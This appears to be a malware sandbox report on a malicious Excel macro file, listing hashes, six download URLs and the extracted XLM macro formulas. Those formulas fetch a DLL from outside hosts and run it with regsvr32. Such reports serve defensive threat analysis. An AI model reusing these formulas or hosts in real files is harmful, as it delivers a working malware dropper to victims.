Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

?i=1hxsjeymc.xlsm

windows7_x64

10

?i=1hxsjeymc.xlsm

windows10-2004_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ?i=1hxsjeymc

  • Size

    50KB

  • MD5

    793c5a832ea9b3c4a225bc96b4449bc2

  • SHA1

    168afc78144b659b18b606a26c3e9a6343dd104a

  • SHA256

    894658b992050ab6d7ee061f083a48264ce56c1b4fbc5ac87c142765405a47f7

  • SHA512

    df041addb6c8113b2add5439f8ce258016233a47a13a3d540187872e4ac25fe3ac87b016bb391a703e0cb73189f1720c0e723b6df47ef971238312ed77a9b607

  • SSDEEP

    768:V69cyRJvh5wVkTHmKNx9gcpLy4TB8wNF2XpL2rQUydmRSLLMO:VwJJvhqkTGKL9lPRNc5eQpdmRUMO

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

http://hoatuoiso1.com/replace/fVea/

https://rumkeke.com/wp-admin/A8/

https://www.restaurantgaig.com/wp-includes/HLDoANj/

http://www.grandfurniture.com/thegrandbrands/eGd55tEm9qkPNOhViP/

http://www.hiway91.com/wp-content/Y/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/","..\rulm.dll",0,0) =IF('EGSBBB'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hoatuoiso1.com/replace/fVea/","..\rulm.dll",0,0)) =IF('EGSBBB'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rumkeke.com/wp-admin/A8/","..\rulm.dll",0,0)) =IF('EGSBBB'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.restaurantgaig.com/wp-includes/HLDoANj/","..\rulm.dll",0,0)) =IF('EGSBBB'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.grandfurniture.com/thegrandbrands/eGd55tEm9qkPNOhViP/","..\rulm.dll",0,0)) =IF('EGSBBB'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.hiway91.com/wp-content/Y/","..\rulm.dll",0,0)) =IF('EGSBBB'!D22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rulm.dll") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • ?i=1hxsjeymc
    .xlsm office2007

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.